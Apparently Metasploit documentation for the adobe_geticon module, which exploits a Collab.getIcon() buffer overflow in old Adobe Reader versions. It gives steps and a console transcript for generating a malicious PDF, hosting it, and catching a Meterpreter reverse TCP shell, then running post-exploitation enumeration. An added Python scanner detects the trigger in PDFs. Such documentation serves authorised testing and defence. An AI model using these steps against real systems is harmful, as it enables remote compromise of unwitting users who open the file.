GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/fileformat/adobe_geticon.md
Vulnerable Application

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions are those earlier than 7.1.1, 8.1.3, and 9.1 in the 7.x, 8.x, and 9.x branches respectively. By creating a specially crafted PDF that contains a malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code in the context of the user who opens the file.

Link to vulnerable software: OldVersion

Test results (on Windows XP SP3)

  • reader 7.0.5 - no trigger

  • reader 7.0.8 - no trigger

  • reader 7.0.9 - no trigger

  • reader 7.1.0 - no trigger

  • reader 7.1.1 - reported not vulnerable

  • reader 8.0.0 - works

  • reader 8.1.2 - works

  • reader 8.1.3 - reported not vulnerable

  • reader 9.0.0 - works

  • reader 9.1.0 - reported not vulnerable

Options

FILENAME

The name of the PDF the module writes to the local msf4 directory (/root/.msf4/local/ in the scenario below).

Verification Steps

  1. Install application on the target machine

  2. Start msfconsole

  3. Do: use exploit/windows/fileformat/adobe_geticon

  4. Do: set payload [windows/meterpreter/reverse_tcp]

  5. Do: set LHOST [IP]

  6. Do: exploit

  7. Do: use exploit/multi/handler

  8. Do: set LHOST [IP]

  9. Do: exploit

  10. Do: Open PDF on target machine with vulnerable software
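Before copying the generated file to the target (step 6), it is worth confirming that it actually carries the Collab.getIcon() JavaScript trigger described under Vulnerable Application; the same check is what a defender would run over inbound PDFs. The script below is an added example, not code from the module or its documentation. It walks every PDF object, pulls out each /JS payload (inline literal, hex string, or a reference to a stream object that may be FlateDecode-compressed), and reports the scripts that reference Collab.getIcon. The sample PDFs it scans are constructed inside the script; the exact object layout the module's icon.pdf uses is not assumed, only that the script is reachable through a /JS key.

```python
"""Scan a PDF for JavaScript that calls Collab.getIcon().

Added example, not code from the Metasploit module. The builder at the
bottom constructs test PDFs here; it is not the layout the module emits.
"""
import re
import zlib

GETICON_RE = re.compile(rb"Collab\s*\.\s*getIcon\s*\(")
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)endobj", re.S)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
_ESC = {b"n": b"\n", b"r": b"\r", b"t": b"\t"}


def _read_literal(buf, start):
    """Read the PDF literal string whose opening '(' sits at buf[start].

    Nesting depth is tracked because balanced parentheses are legal
    unescaped inside a PDF literal, and JavaScript is full of them; a
    regex that stops at the first ')' would truncate the script.
    """
    depth, i, out = 0, start, bytearray()
    while i < len(buf):
        c = buf[i:i + 1]
        if c == b"\\" and i + 1 < len(buf):      # backslash escape
            nxt = buf[i + 1:i + 2]
            out += _ESC.get(nxt, nxt)
            i += 2
            continue
        if c == b"(":
            depth += 1
            if depth > 1:
                out += c
        elif c == b")":
            depth -= 1
            if depth == 0:
                return bytes(out)
            out += c
        else:
            out += c
        i += 1
    return bytes(out)  # unterminated literal: return what was read


def _stream_payload(obj_body):
    """Return a stream object's data, inflated if it declares /FlateDecode."""
    m = STREAM_RE.search(obj_body)
    if not m:
        return b""
    data = m.group(1)
    if re.search(rb"/Filter\s*/FlateDecode", obj_body):
        try:
            data = zlib.decompress(data)
        except zlib.error:
            pass  # corrupt stream: fall back to raw bytes so a literal match still fires
    return data


def extract_javascript(pdf):
    """Return every JavaScript body reachable through a /JS key, in object order."""
    objects = {(int(m.group(1)), int(m.group(2))): m.group(3)
               for m in OBJ_RE.finditer(pdf)}
    scripts = []
    for body in objects.values():
        for m in re.finditer(rb"/JS\s*\(", body):                   # literal string
            scripts.append(_read_literal(body, m.end() - 1))
        for m in re.finditer(rb"/JS\s*<([0-9A-Fa-f\s]*)>", body):   # hex string
            h = re.sub(rb"\s", b"", m.group(1))
            scripts.append(bytes.fromhex((h + b"0" * (len(h) % 2)).decode()))
        for m in re.finditer(rb"/JS\s+(\d+)\s+(\d+)\s+R", body):    # indirect stream
            target = objects.get((int(m.group(1)), int(m.group(2))))
            if target is not None:
                scripts.append(_stream_payload(target))
    return scripts


def find_geticon_calls(pdf):
    """Return the scripts in the PDF that invoke Collab.getIcon()."""
    return [js for js in extract_javascript(pdf) if GETICON_RE.search(js)]


def build_sample_pdf(js, inline=False, compress=False):
    """Construct a minimal PDF whose /OpenAction runs `js` (test input made here)."""
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
    ]
    if inline:
        # Only backslashes need escaping; balanced parentheses may stay as-is.
        objs.append(b"<< /S /JavaScript /JS (" + js.replace(b"\\", b"\\\\") + b") >>")
    else:
        data = zlib.compress(js) if compress else js
        filt = b"/Filter /FlateDecode " if compress else b""
        objs.append(b"<< /S /JavaScript /JS 5 0 R >>")
        objs.append(b"<< " + filt + (b"/Length %d >>\nstream\n" % len(data))
                    + data + b"\nendstream")
    out, offsets = bytearray(b"%PDF-1.4\n"), []
    for num, body in enumerate(objs, start=1):
        offsets.append(len(out))
        out += (b"%d 0 obj\n" % num) + body + b"\nendobj\n"
    xref_at = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    out += b"".join(b"%010d 00000 n \n" % off for off in offsets)
    out += (b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n"
            % (len(objs) + 1, xref_at))
    return bytes(out)


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            hits = find_geticon_calls(fh.read())
        print("%s: %d Collab.getIcon() script(s)" % (path, len(hits)))
```

Run it as `python scan_geticon.py /root/.msf4/local/icon.pdf` to check the module's output, or point it at any PDF under investigation. The parser is deliberately lenient (it does not follow the xref table and tolerates corrupt streams) because malicious files are often malformed on purpose; a report of zero hits therefore means only that nothing matched, not that the file is clean.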

Scenarios

Adobe Reader 8.0.0 on Windows XP (5.1 Build 2600, Service Pack 3)

```
msf > use exploit/windows/fileformat/adobe_geticon
msf exploit(windows/fileformat/adobe_geticon) > set FILENAME icon.pdf
FILENAME => icon.pdf
msf exploit(windows/fileformat/adobe_geticon) > exploit

[*] Creating 'icon.pdf' file...
[+] icon.pdf stored at /root/.msf4/local/icon.pdf
msf exploit(windows/fileformat/adobe_geticon) > cp /root/.msf4/local/icon.pdf /var/www/html/icon.pdf
[*] exec: cp /root/.msf4/local/icon.pdf /var/www/html/icon.pdf

msf payload(windows/meterpreter/reverse_tcp) > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Sending stage (180291 bytes) to 192.168.1.5
[*] Meterpreter session 3 opened (192.168.1.3:4444 -> 192.168.1.5:1160) at 2019-12-06 14:40:10 -0700

meterpreter > sysinfo
Computer        : COMPUTER_1
OS              : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: COMPUTER_1\USER
meterpreter > run post/windows/gather/enum_applications

[*] Enumerating applications installed on COMPUTER_1

Installed Applications
======================

 Name            Version
 ----            -------
 Adobe Reader 8  8.0.0

[+] Results stored in: /root/.msf4/loot/20191206144654_default_192.168.1.5_host.application_162364.txt
```